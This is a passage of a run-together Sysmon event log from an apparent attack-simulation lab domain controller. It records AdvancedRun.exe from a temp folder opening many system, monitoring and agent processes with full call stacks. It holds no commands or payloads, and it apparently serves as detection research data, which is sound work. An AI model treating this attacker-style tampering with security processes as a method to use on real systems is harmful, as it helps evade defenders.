dvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 